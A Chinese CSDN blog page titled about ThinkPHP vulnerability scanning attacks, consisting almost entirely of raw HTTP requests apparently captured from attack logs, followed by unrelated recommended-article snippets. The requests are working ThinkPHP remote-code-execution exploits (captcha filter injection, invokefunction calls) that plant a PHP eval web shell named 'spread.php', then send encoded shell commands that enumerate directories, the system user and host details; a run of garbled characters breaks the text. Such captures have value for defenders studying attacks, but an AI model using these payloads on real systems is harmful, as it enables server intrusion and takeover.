php %3c0x1a%3e是什么_利用ThinkPHP漏洞扫描攻击-程序员宅基地

技术标签: php %3c0x1a%3e是什么  

利用ThinkPHP漏洞扫描攻击

115.238.244.112   119.3.90.139    94.191.10.105

40df6573d872270ca3fe57d8c25b06f1.png

72680addf68e8d1799a264d02fdc82ad.png

f956d734a7b8d7f9328d97cdef2a4b37.png

824fbf778fb80687578881d053c6ebc5.png

b1847fc596b54fd4b7ebfb874d3d2426.png

6a43e3563261a1f599e185cba99d68f6.png

beda999d1301a4e8c0d308b7ebedcdce.png

e91a4043ee04415ec24ed1837608c32a.png

bad60131b0da8cca125f7fcfa3f18719.png

9f299480e47804925e4f3422cf3aee75.png

a475ca80a953afd7a28b478d2c4fdcf1.png

de4170274faaccbc2df648519f79c035.png

9b439c787045acca84796cb343ccdfc5.png

08a6350b768287a46afc569e67c42494.png

dc7aaad8bb29cf9fdbd72a2449d490ce.png

24e6c4ade96e20bbefaa77f178671ba6.png

f23fb70e173c470aee4f7de9ca064312.png

843be794d4e2534aa718a606d5e99c38.png

10028d2f2ba4c8234e02827985e75af1.png

POST /index.php/?s=captcha HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

Content-Length: 172

_method=construct&filter[]=assert&filter[]=file_put_contents('spread.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3NwcmVhZF0pOz8+'))&server=-1<?php @eval($_POST[spread]);?>

POST /index.php/?s=captcha HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

Content-Length: 183

Cookie: _f8a26=http://10.42.19.31:10000

_method=__construct&filter[]=file_put_contents('spread.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3NwcmVhZF0pOz8+'))&method=get&server[REQUEST_METHOD]=<?php @eval($_POST[spread]);?>

POST /spread.php HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

Content-Length: 988

spread=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22SB360%22%3Becho%20%40asenc(%24output)%3Becho%20%22SB360%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%7C%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%7C%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

POST /spread.php HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

Content-Length: 1717

Cookie: _f8a26=http://10.42.163.158:10000

spread=%40eval%2F%2A%15%99%D0%21%03%19s%20%0B%CB%A8%DD%E3%A3%C5%C4%BB%C5%CE%2A%2F%01%28%24%7B%27%5FP%27.%27OST%27%7D%5Bz9%5D%2F%2A%A0%9B%3F%C0%9A%3F%E0%99%3F%20%99%E3%2A%2F%01%28%24%7B%27%5FPOS%27.%27T%27%7D%5Bz0%5D%29%29%3B&z0=ODQzMTQzO0Bpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtlY2hvKCItPnwiKTskR0xPQkFMU1snSSddPTA7JEdMT0JBTFNbJ0QnXT1pc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKT8kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOihpc3NldCgkX1NFUlZFUlsnQVBQTF9QSFlTSUNBTF9QQVRIJ10pP3RyaW0oJF9TRVJWRVJbJ0FQUExfUEhZU0lDQUxfUEFUSCddLCJcXCIpOihpc3NldCgkX1snUEFUSF9UUkFOU0xBVEVEJ10pP3N0cl9yZXBsYWNlKCRfU0VSVkVSWyJQSFBfU0VMRiJdKTpzdHJfcmVwbGFjZShzdHJfcmVwbGFjZSgiLyIsIlxcIixpc3NldCgkX1NFUlZFUlsiUEhQX1NFTEYiXSk%2FJF9TRVJWRVJbIlBIUF9TRUxGIl06KGlzc2V0KCRfU0VSVkVSWyJVUkwiXSk%2FJF9TRVJWRVJbIlVSTCJdOiRfU0VSVkVSWyJTQ1JJUFRfTkFNRSJdKSksIiIsaXNzZXQoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKT8kX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl06JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKSkpO0JMKCRHTE9CQUxTWydEJ10sMCk7ZnVuY3Rpb24gQkwoJFAsJE4pe2lmKGlzX2ZpbGUoJFApfHwkR0xPQkFMU1snSSddPj0kX1BPU1RbInoyIl0pcmV0dXJuOyRKPWJhc2VuYW1lKCRQKTtpZigkUD09JEdMT0JBTFNbJ0QnXSkkSj0iKiI7aWYoc3RyaXBvcygifHwiLCJ8Ii4kSi4ifCIpPT09RkFMU0UpRFcoJFApOyRBPUBvcGVuZGlyKCRQKTtpZigkQSE9TlVMTCl7d2hpbGUoJEI9QHJlYWRkaXIoJEEpKXtpZigkQiE9Ii4iJiYkQiE9Ii4uIikkRT0kUC4iLyIuJEI7aWYoQGlzX2RpcigkRSkmJiROPCRfUE9TVFsiejMiXSlCTCgkRSwkTisxKTt9QGNsb3NlZGlyKCRBKTt9fWZ1bmN0aW9uIERXKCRIKSB7JE49InRtcC50bXAiO2lmKGlzX2RpcigkSCkpe2lmKEBmd3JpdGUoQGZvcGVuKCIkSC8kTiIsICd3JyksInRtcCIpKXtAdW5saW5rKCIkSC8kTiIpO2VjaG8gc3RyX3JlcGxhY2UoIlxcIiwiLyIsJEgpLiJ8IjskR0xPQkFMU1snSSddPSRHTE9CQUxTWydJJ10rMTt9fX1lY2hvKCJ8PC0iKTtkaWUoKTs%3D&z9=BaSE64%5FdEcOdE&z2=1&z3=100

GET /public/index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B1%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

GET /public/index.php?s=index/%5Cthink%5CRequest/input&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

GET /public/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������GET /public/index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

GET /public/index.php?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36410567/article/details/115108157

智能推荐

RK3568 重新封装V4l2为一个C++ Camera管理类 (基于RK编译环境)_mpp_buffer_type_ext_dma-程序员宅基地

文章浏览阅读1.3k次。RK3568 重新Camera_source.c封装为一个C++ Camera管理类 _mpp_buffer_type_ext_dma

python-字符串作为代码执行(exec、eval、locals、compile)_python将字符串作为代码执行-程序员宅基地

文章浏览阅读1.8w次,点赞16次,收藏43次。字符串作为代码执行的方法:1、eval()构造器:eval(source, globals=None, locals=None, /)说明:输入一个【python表达式或code对象】参与计算。用于恶意攻击,窥视:再看下eval的参数globals和locals参数的用法,看栗子:一幕了然,局部变量空间和全局变量空间的优先级的先后顺序~2、e..._python将字符串作为代码执行

杨辉三角的Python实现_python编写函数实现杨辉三角形,左对齐-程序员宅基地

文章浏览阅读6.2k次。#杨辉三角定义如下:# 1# 1 1# 1 2 1# 1 3 3 1# 1 4 6 4 1# 1 5 10 10 5 1#把每一行看做一个list,试写一个generator,不断输出下一行的list:#!/usr/bin/env python_python编写函数实现杨辉三角形,左对齐

SparkSQL之Join原理_spark sql join原理-程序员宅基地

文章浏览阅读4.5k次,点赞5次,收藏26次。文章目录前言:Join背景介绍Join常见分类以及基本实现机制Hash JoinBroadcast Hash JoinShuffle Hash JoinSort-Merge Join总结前言:写SQL的时候很多时候都有用到join语句,但是我们真的有仔细想过数据在join的过程到底是怎么样的吗?今天借这位大神的文章来交接下sql中join的原理。同样,如有冒犯,请联系。Join背景介绍Jo..._spark sql join原理

Python到底有多强?双十一的时候带你领略它的强大之处!_python球鞋怎么样-程序员宅基地

文章浏览阅读558次。双十一第一波付尾款已经开始啦,怎么样不过很烦的事情就是:手速不够快,抢不过人家总是错过优惠券看到好东西,稍微犹豫了下,然后也没了,哭唧唧成天忙得晕头转向,忘记付尾款,不仅东西没抢到,定金也没了······还有啊,双十一的优惠攻略真的是看得人头秃,主会场红包雨、聚划算百亿补贴、淘宝双十一红包、天猫超市会场、双十一购物津贴、跨店减、满额减、买30ml送60ml······哪个更便宜?感觉回到了上学时被数学支配的恐惧。所以不管是双十一,还是618、818、七夕购物节等活_python球鞋怎么样

r包安装固定版本r包 安装某个版本r包 安装特定版本的R包_怎么安装不同版本的r-程序员宅基地

文章浏览阅读6.3k次,点赞5次,收藏19次。r安装固定版本 安装某个版本 安装特定版本的R包1采用大家普遍使用的指定R包版本的方法安装 require(devtools) install_version("ggplot2", version = "3.2.1", repos = "http://cran.us.r-project.org")继续采用第二种指导R包版本的方法,就是在官网下载对应版本的R包原始代码文件install.packages(("E:/ggplot2_3.2.1.tar.gz"))3.如何查找旧版本的R包并且_怎么安装不同版本的r

随便推点

三角函数和向量_三角函数和向量的转换-程序员宅基地

文章浏览阅读6.7k次。三角函数1. 角度和弧度的转换:radians = degrees * PI / 180degrees = radians * 180 / PI2. 非直角三角形的计算: 已知a,b,和角度theta c,则有:c2 = a2 + b2 - 2ab*cos(theta c) 3. 三角函数图: 有公式: a / sin(the_三角函数和向量的转换

Spring Boot深入理解SpringApplication.run()方法启动_springapplication.run(registerserverapplication.cl-程序员宅基地

文章浏览阅读1.2w次。我们知道spring boot项目启动,只需要启动@SpringBootApplication.calss中的含有SpringApplication.run()方法的main方法就可以@SpringBootApplicationpublic class Application { public static void main(String[] args) { Sp..._springapplication.run(registerserverapplication.class, args)

【seafile】之 预览电子发票PDF显示不全问题_unigb-ucs2-h.bcmap-程序员宅基地

文章浏览阅读1.6w次,点赞5次,收藏6次。文章目录一、问题来源二、解决三、题外话近期在处理网盘和在线文件相关问题,面对的事比较多且杂,记录下。问题:seafile自身预览PDF文件,部分不显示图片显示如下:一、问题来源seafile版本:7.0.5原因:原文件pdf,字体没有嵌入,所以需要本系统的字体渲染seafile 使用 pdf.min.js,而把对应map集成了。解决这个问题,关键点在 seafi..._unigb-ucs2-h.bcmap

Python OpenCV实例:Gabor滤波器参数可视化-程序员宅基地

文章浏览阅读205次。为什么80%的码农都做不了架构师?>>> ..._gabor核可视化

bat代码如何处理中文目录_bat 中文目录-程序员宅基地

文章浏览阅读1.7k次。bat代码如何处理中文目录注意事项注意事项txt编辑代码,另存为,选择保存路径——选择保存类型为所有文件——文件名添加.bat后缀——中文路径:编码方式选择ANSI_bat 中文目录

正在CPU上运行的进程_浅谈cpu.idle和cpu.load-程序员宅基地

文章浏览阅读197次。最近在配合运维进行系统压测,进行系统评估的时候cpu.idle和cpu.load是两个主要参考指标。在Linux系统中,通过top命令可以查看cpu.idle和cpu.load。在说明这两个指标之前,必须对系统运转有一个整体的认识。在Linux内核中,每个进程都会被分配一个固定的时间片(默认为10ms)。在这10ms中,该进程享有cpu的所有权。如果该进程用完了10ms,或者有其他优先级高的进程发..._cpu上正在运行的应用程序怎么关闭

推荐文章

热门文章

相关标签